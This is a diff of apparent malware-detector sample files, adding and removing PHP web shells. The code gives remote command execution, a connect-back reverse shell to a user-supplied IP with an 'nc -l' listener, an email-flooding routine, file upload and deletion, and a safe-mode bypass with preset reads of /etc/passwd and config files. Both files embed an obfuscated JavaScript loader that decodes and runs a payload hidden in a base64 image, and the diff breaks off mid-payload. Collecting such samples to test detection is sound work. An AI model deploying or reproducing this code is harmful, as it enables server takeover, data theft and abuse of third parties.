+                        <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
+
+                        <?
+
+                        //*******************************************************
+
+                        //Start Programs About US
+
+                        $id=$_GET['id'];
+
+
+
+                        if ($id=="") {
+
+                        echo "
+
+                        <font face='Arial Black' color='#808080' size='1'>
+
+***************************************************************************<br>
+
+&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
+
+&nbsp;Programer : Hossein Asgary <br>
+
+&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
+
+&nbsp;please : If you find bug or problems in program , tell me by : <br>
+
+&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
+
+Enjoy :) [Only 4 Best Friends ] <br>
+
+***************************************************************************</font></span></p>
+
+";
+
+
+
+echo "<font color='#333333' size='2'>OS :". php_uname();
+
+echo "<br>IP :". 
+
+($_SERVER['REMOTE_ADDR']);
+
+echo "</font>";
+
+
+
+
+
+                        }
+
+                        //************************************************************
+
+                        //cmd-command line
+
+                        $cmd=$_POST['cmd'];
+
+                        if($id=="cmd"){
+
+                $result=shell_exec("$cmd");
+
+                echo "<br><center><h3> CMD ExeCute </h3></center>" ;
+
+                echo "<center>
+
+                <textarea rows=20 cols=70 >$result</textarea><br>
+
+                <form method='POST' action=''>
+
+                <input type='hidden' name='id' value='cmd'>
+
+                <input type='text' size='80' name='cmd' value='$cmd'>
+
+                <input type='submit' value='cmd'><br>";
+
+                        
+
+                        
+
+                        
+
+                        }
+
+                        
+
+                //********************************************************      
+
+                
+
+                //fake mail = Use victim server 4 DOS - fake mail 
+
+                if ( $id=="fake-mail"){
+
+                error_reporting(0);
+
+                echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
+
+                echo "<center><form method='post' action=''>
+
+                Victim Mail :<br><input type='text' name='to' ><br>
+
+                Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
+
+                Comments:
+
+                <br>
+
+                <textarea rows='10' cols=50 name='Comments' ></textarea><br>
+
+                <input type='submit' value='Send Mail Strm ' >
+
+                </form></center>";
+
+                //send Storm Mail
+
+                $to=$_POST['to'];
+
+                $nom=$_POST['nom'];
+
+                $Comments=$_POST['Comments'];
+
+                if ($to <> "" ){
+
+                for ($i = 0; $i < $nom ; $i++){
+
+                $from = rand (71,1020000000)."@"."Attacker.com";
+
+                $subject= md5("$from");
+
+        mail($to,$subject,$Comments,"From:$from");
+
+        echo "$i is ok";
+
+        }      
+
+        echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
+
+        }
+
+                }
+
+                //********************************************************
+
+
+
+                        //Connect Back -Firewall Bypass
+
+                        if ($id=="cshell"){
+
+                        echo "<br>Connect back Shell , bypass Firewalls<br>
+
+                        For user :<br>
+
+                        nc -l -p 1019 <br>
+
+                        <hr>
+
+                        <form method='POST' action=''><br>
+
+                        Your IP & BindPort:<br>
+
+                        <input type='text' name='mip' >
+
+                        <input type='text' name='bport' size='5' value='1019'><br>
+
+                        <input type='submit' value='Connect Back'>
+
+                        </form>";
+
+                 $mip=$_POST['mip'];
+
+                 $bport=$_POST['bport'];
+
+                 if ($mip <> "")
+
+                 {
+
+                 $fp=fsockopen($mip , $bport , $errno, $errstr);
+
+                 if (!$fp){
+
+                       $result = "Error: could not open socket connection";
+
+                 }
+
+                 else {
+
+                 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
+
+          while(!feof($fp)){ 
+
+       fputs ($fp," bash # ");
+
+       $result= fgets ($fp, 4096);
+
+      $message=`$result`;
+
+       fputs ($fp,"--> ".$message."\n");
+
+      }
+
+      fclose ($fp);
+
+                 }
+
+                 }
+
+                        }
+
+                        
+
+                //********************************************************
+
+                        //Spy File Manager
+
+                        $homedir=getcwd();
+
+                        $dir=realpath($_GET['dir'])."/";
+
+                        if ($id=="fm"){
+
+                        echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
+
+                  &nbsp;<b>
+
+                  <form action='' method='GET'>
+
+                  &nbsp;Path:</b>
+
+                  <input type='hidden' name='id' value='fm'>
+
+                  <input type='text' name='dir' size='80' value='$dir'>
+
+                  <input type='submit' value='dir'>
+
+                  </form>
+
+                 <br>";
+
+
+
+                        echo "
+
+
+
+<div align='center'>
+
+
+
+<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
+
+        <tr>
+
+                <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
+
+                <td height='28' width='82' align='center'>
+
+                <font color='#000080' size='2'><b>Size KByte</b></font></td>
+
+                <td height='28' width='83' align='center'>
+
+                <font color='#008000' size='2'><b>Download</b></font></td>
+
+                <td height='28' width='66' align='center'>
+
+                <font color='#FF9933' size='2'><b>Edit</b></font></td>
+
+                <td height='28' width='75' align='center'>
+
+                <font color='#999999' size='2'><b>Chmod</b></font></td>
+
+                <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
+
+        </tr>";
+
+                    if (is_dir($dir)){
+
+                    if ($dh=opendir($dir)){
+
+                    while (($file = readdir($dh)) !== false) {
+
+                    $fsize=round(filesize($dir . $file)/1024);
+
+                
+
+                    
+
+        echo " 
+
+        <tr>
+
+                <th width='250' height='22' align='left' nowrap>";
+
+                if (is_dir($dir.$file))
+
+                {
+
+                echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
+
+                }
+
+                else {
+
+                echo "<font size='2' color='#666666'>&nbsp;$file ";
+
+                }
+
+                echo "</a></font></th>
+
+                <td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
+
+                if (is_file($dir.$file))
+
+                {
+
+                echo "$fsize";
+
+                }
+
+                else {
+
+                echo "&nbsp; ";
+
+                }
+
+                echo "
+
+                </b></font></td>
+
+                <td width='103' align='center' nowrap>";
+
+                if (is_file($dir.$file)){
+
+                if (is_readable($dir.$file)){
+
+                echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
+
+                }else {
+
+                echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+
+                 }
+
+                }else {
+
+                echo "&nbsp;";
+
+                 }
+
+                echo "
+
+                </a></font></td>
+
+                <td width='77' align='center' nowrap>";
+
+                if (is_file($dir.$file))
+
+                {
+
+                if (is_readable($dir.$file)){
+
+                echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
+
+                }else {
+
+                echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+
+                 }
+
+                }else {
+
+                echo "&nbsp;";
+
+                 }
+
+                echo "
+
+                </a></font></td>
+
+                <td width='86' align='center' nowrap>";
+
+                if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+
+                echo "<font size='1' color='#999999'>Dont in windows";
+
+                }
+
+                else {
+
+                echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
+
+                }
+
+                echo "</a></font></td>
+
+                <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
+
+        </tr>
+
+        ";
+
+                      }
+
+                      closedir($dh);
+
+                    } 
+
+                    }
+
+                    echo "</table>
+
+<form enctype='multipart/form-data' action='' method='POST'>
+
+ <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
+
+ Send this file: <input name='userfile' type='file' />
+
+ <inpt type='hidden' name='Fupath'  value='$dir'>
+
+ <input type='submit' value='Send File' />
+
+</form> 
+
+                    </div>";
+
+                        }
+
+//Upload Files 
+
+$rpath=$_GET['dir'];
+
+if ($rpath <> "") {
+
+$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
+
+print "<pre>";
+
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
+
+echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
+
+echo "<script language='javascript'> history.back(2)</script>";
+
+}
+
+ }
+
+ //file deleted
+
+$frpath=$_GET['fdelete'];
+
+if ($frpath <> "") {
+
+if (is_dir($frpath)){
+
+$matches = glob($frpath . '/*.*');
+
+if ( is_array ( $matches ) ) {
+
+  foreach ( $matches as $filename) {
+
+  unlink ($filename);
+
+  rmdir("$frpath");
+
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+
+echo "<script language='javascript'> history.back(1)</script>";
+
+  }
+
+  }
+
+  }
+
+  else{
+
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+
+unlink ("$frpath");
+
+echo "<script language='javascript'> history.back(1)</script>";
+
+exit(0);
+
+
+
+  }
+
+  
+
+
+
+}
+
+                        ?>
+
+                        
+
+                        </td>
+
+                </tr>
+
+                <tr>
+
+                        <td style="border: 1px dotted #FFCC66">
+
+                        <p align="center"><font color="#666666" size="1" face="Tahoma"><br>
+
+                        Copyright 2004-Simorgh Security<br>
+
+                        Hossein-Asgari<br>
+
+                        </font><font color="#c0c0c0" size="1" face="Tahoma">
+
+                <a style="TEXT-DECORATION: none" href="http://www.r57.biz">
+
+                <font color="#666666">www.r57.biz</font></a></font></td>
+                
+                </tr>
+
+        </table>
+<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
+<script type="text/javascript">
+if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
+setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(4);}, 500);
+</script>
+</div>
+
+</body>
+
+
+
+</html>
diff --git a/php-malware-finder/samples/classic/sosyete.php b/data/samples/classic/sosyete.php
index 91c7006..b43476f 100644
--- a/php-malware-finder/samples/classic/sosyete.php
+++ b/data/samples/classic/sosyete.php
@@ -1,225 +1,225 @@
-<html>

- <head>

-   <meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa">

-   <title> Sosyete Safe Mode Bypass Shell </title>

-   <style>

-   td {

-   font-family: verdana, arial, ms sans serif, sans-serif;

-   font-size: 11px;

-   color: #D5ECF9;

-   }

-   BODY {

-   margin-top: 4px;

-   margin-right: 4px;

-   margin-bottom: 4px;

-   margin-left: 4px;

-   scrollbar-face-color: #b6b5b5;

-   scrollbar-highlight-color: #758393;

-   scrollbar-3dlight-color: #000000;

-   scrollbar-darkshadow-color: #101842;

-   scrollbar-shadow-color: #ffffff;

-   scrollbar-arrow-color: #000000;

-   scrollbar-track-color: #ffffff;

-   }

-   A:link {COLOR:blue; TEXT-DECORATION: none}

-   A:visited { COLOR:blue; TEXT-DECORATION: none}

-   A:active {COLOR:blue; TEXT-DECORATION: none}

-   A:hover {color:red;TEXT-DECORATION: none}

-   input, textarea, select {

-   background-color: #EBEAEA;

-   border-style: solid;

-   border-width: 1px;

-   font-family: verdana, arial, sans-serif;

-   font-size: 11px;

-   color: #333333;

-   padding: 0px;

-   }

-   </style>

-   </head>

-    <BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">

-        <center>

-        <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>

-        <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">

-    <p align="center"> </p>

-    <p align="center">

-    <a bookmark="minipanel">

-    <font face="Webdings" size="7" color="#DCE7EF"></font></a><font size="7" face="Martina"></font><span lang="en-us"><font size="3" face="Martina"> </font>

-    <br>

-        <font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>

-    </p>

-            <a bookmark="minipanel">

-    <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>

-    <p align="center">Sosyete Safe Mode Bypass Shell 

-    <b>

-        <font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>

-   </p>

-        <a bookmark="minipanel">

-  <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>

-  <p align="center">~

-    <b>

-

-

-                <p>

-    </form>

-        </p>

-                </td>

-

-

-    </tr>

-            </table>   

-     </a>

-         

-         <p>

-         

-             <br>

-                 </p>

-        

-     <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>

-        <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">

-  <b>

-     </b>

-         <font face="Wingdings 3" size="5"></font><b>Sosyete Safe Mode Bypass Shell ; Bypass shell'lerden esinlenerek birçok shell'in ortak karisimi olarak sunulmustur.<span lang="en-us"></span><span lang="en-us"></span> </b><font face="Wingdings 3" size="5"></font></p><p align="center"> </p></td></tr></table>

-

-</a>

-

-

-<div align="right">

-

-<span lang="en-us">

-

-        </span>

-                        </div>

-                </body>

-    </html>

-

- <?

-

-

-echo "<b><font color=red>Sosyete Bypass Main Menu</font></b><br>";

-

-print_r('

-

-

-

-

-<pre>

-

-

-<form method="POST" action="">

-<b><font color=red> </font></b><input name="sosyete" type="text"><input value="&#199;al&#305;&#351;t&#305;r" type="submit">

-</form>

-<form method="POST" action="">

-<b><font color=red></font><select size="1" name="fuck">

-<option value=" ">Sosyete safe mode bypass shell</option>

-<option value="id;pwd">id & Dizin</option>

-<option value="ls">Dosyalar</option>

-<option value="uname -a">Server</option>

-<option value="netstat -an | grep -i listen">A&#231;&#305;k Portlar</option>

-<option value="ipconfig">A&#287; Bilgisi</option>

-<option value="ps -aux">Uygulamalar</option>

-<option value="who -q">Kullan&#305;c&#305; Say&#305;s&#305;</option>

-<option value="cat /etc/passwd">cat/etc/passwd</option>

-<option value="cat /var/cpanel/accounting.log">cat/var/cpanel/accounting.log</option>

-<option value="cat /etc/syslog.conf">cat/etc/syslog.conf</option>

-<option value="cat /etc/hosts">cat/etc/hosts</option>

-<option value="cat /etc/named.conf">cat/etc/named.conf</option>

-<option value="cat /etc/httpd/conf/httpd.conf">cat/etc/httpd/conf/httpd.conf</option>

-</select> <input type="submit" value="&#199;al&#305;&#351;t&#305;r">

-</form>

-</pre>

-<style>

-   td {

-   font-family: verdana, arial, ms sans serif, sans-serif;

-   font-size: 11px;

-   color: #D5ECF9;

-   }

-   BODY {

-   margin-top: 4px;

-   margin-right: 4px;

-   margin-bottom: 4px;

-   margin-left: 4px;

-   scrollbar-face-color: #b6b5b5;

-   scrollbar-highlight-color: #758393;

-   scrollbar-3dlight-color: #000000;

-   scrollbar-darkshadow-color: #101842;

-   scrollbar-shadow-color: #ffffff;

-   scrollbar-arrow-color: #000000;

-   scrollbar-track-color: #ffffff;

-   }

-   A:link {COLOR:blue; TEXT-DECORATION: none}

-   A:visited { COLOR:blue; TEXT-DECORATION: none}

-   A:active {COLOR:blue; TEXT-DECORATION: none}

-   A:hover {color:red;TEXT-DECORATION: none}

-   input, textarea, select {

-   background-color: #EBEAEA;

-   border-style: solid;

-   border-width: 1px;

-   font-family: verdana, arial, sans-serif;

-   font-size: 11px;

-   color: #333333;

-   padding: 0px;

-   }

-  </style></head>

-<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">

-<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>

-    <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">

-<p align="center"> </p>

-    <p align="center">

-<a bookmark="minipanel">

-    <font face="Webdings" size="7" color="#DCE7EF"></font></a><font size="7" face="Martina"></font><span lang="en-us"><font size="3" face="Martina"> </font>

-    <br>

-<font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>

-</p>

-

-

-<div align="right">

-

-<span lang="en-us"> </span></div></body></html>

-

-

-');

-ini_restore("safe_mode");

-ini_restore("open_basedir");

-$fuck=shell_exec($_POST['sosyete']); 

-$mokoko=shell_exec($_POST['fuck']); 

-echo "<pre><h4>";

-echo "<b><font color=red>Komut Sonucu </font></b><br>"; 

-echo $fuck;

-echo $mokoko;

-echo "</h4></pre>";

-

-?>

-

-</tr>

-        </table>    

-                

-                </a>

-                        <p>

-                                

-        <br>

-        

-                </p>

-                                        <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>

-    <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">

-    

-        <b>

-     

-         </b><font face="Wingdings 3" size="5"></font><b><font color="#CC0000">Sosyete Safe Mode Bypass Shell<span lang="en-us"></span> <span lang="en-us"> </span>  </b><font color="#CC0000"><b>Coded by</b> </font><b><span lang="en-us"><a href="http://www.r57.biz"><font color="#CC0000">r57.biz</a></span><font color="#CC0000"> ~ <span lang="en-us">Sosyete</span> </b><font face="Wingdings 3" size="5"> </font></p><p align="center"> </p></td></tr></table>

-

-</a>

-

-

-<div align="right">

-

-<span lang="en-us">

-

-</span>

-                </div>

-                <img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2Uz